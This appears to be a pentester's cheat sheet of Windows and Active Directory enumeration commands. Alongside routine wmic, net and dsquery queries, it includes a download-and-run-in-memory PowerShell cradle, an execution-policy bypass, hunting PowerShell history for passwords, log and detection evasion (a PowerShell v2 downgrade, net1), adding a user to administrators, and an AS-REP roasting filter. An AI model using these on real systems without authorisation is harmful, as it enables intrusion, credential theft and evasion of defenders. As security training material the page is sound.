🏝️

Living Off the Land Enumeration

Tags
AuthenticatedOPSECLocal

OS Context

β€£
Basic enum commands
systeminfo
summary of the host's information for us in one tidy output. Running one command will generate fewer logs, meaning less of a chance we are noticed on the host by a defender.

Powershell

Get-Module
list imported mdules
Get-ExecutionPolicy -List
Will print the execution policy settings for each scope on a host.
Set-ExecutionPolicy Bypass -Scope Process
This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Get-ChildItem Env: | ft Key,Value
Return environment values such as key paths, users, computer information, etc.
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
download a file from the web using PowerShell and call it from memory.

OPSEC Techniques

powershell.exe -version 2
Downgrade powershell to a version that doesn’t log. (validate wtih Get-Host)

Checking Defenses

netsh advfirewall show allprofiles
check firewall profile
sc query windefend
check if defender is running from cmd
Get-MpComputerStatus
enum defender specific feature status

Other users on host?

qwinsta

Network Information

arp -a
ipconfig /all
route print
πŸ’‘

Using arp -a and route print will not only benefit in enumerating AD environments, but will also assist us in identifying opportunities to pivot to different network segments in any environment.

Windows Management Instrumentation (WMI)

wmic qfe get Caption,Description,HotFixID,InstalledOn
Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
Displays basic host information to include any attributes within the list
wmic process list /format:list
list all processes
wmic ntdomain list /format:list
DC & Domain info
wmic useraccount list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list
Information about all local groups
wmic sysaccount list /format:list
Dumps information about any system accounts that are being used as service accounts.

Gist Useful Wmic queries for host and domain enumerationGist Useful Wmic queries for host and domain enumeration

Net Commands

net accounts
Information about password requirements
net accounts /domain
Password and lockout policy
net group /domain
Information about domain groups
net group "Domain Admins" /domain
List users with domain admin privileges
net group "domain computers" /domain
list domain computers
net group "Domain Controllers" /domain
List PC accounts of domains controllers
net group <domain_group_name> /domain
User that belongs to the group
net groups /domain

List of domain groups

net localgroup
All available groups
net localgroup administrators /domain
List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators
Information about a group (admins)
net localgroup administrators [username] /add
Add user to administrators
net share
Check current shares
net user <ACCOUNT_NAME> /domain
Get information about a user within the domain
net user /domain
List domain users
net user %username%

Information about the current user

net use x: \computer\share
Mount a share locally
net view
Get a list of computers
net view /all /domain[:domainname]
Shares on the domains
Shares on the domains
List shares of a computer
net view /domain
List of PCs of the domain

OPSEC

πŸ’‘

Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

Dsquery

C:\Windows\System32\dsquery.dll
πŸ’‘

Elevated privs required for dsquery

dsquery user
List users
dsquery computer
List computers

We can use a dsquery wildcard search to view all objects in an OU, for example.

dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
Specific search filters (ASREP Roastable)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
Find DCs